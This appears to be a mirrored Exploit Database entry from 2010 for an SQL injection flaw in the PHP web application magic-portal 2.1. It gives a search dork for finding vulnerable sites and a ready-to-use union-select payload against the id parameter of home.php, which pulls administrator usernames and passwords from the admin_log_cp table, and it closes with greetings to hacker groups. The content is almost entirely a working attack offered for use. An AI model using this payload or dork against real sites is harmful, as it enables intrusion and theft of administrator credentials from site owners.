magic-portal 2.1 – SQL Injection

• Exploit Database
• 13 阅读

• 作者： alnjm33
  日期： 2010-01-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11235/

• ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  Exploit Title :magic-portal SQL injection Vulnerability
  Author: alnjm33
  Software Link:
  Version:2.1
  Tested on: Version 2.1
  My home : Sec-war.com
  ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  ==========================================Dork==========================================
  ( Powered by magic-portal Version 2.1 )
  ================================Exploit=============================================
  http://server/home.php?id=-2/**/union/**/select/**/1,concat(username_admin,0x3a,password_admin),3,4/**/from/**/admin_log_cp--
  
  =======================================================================================
  Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members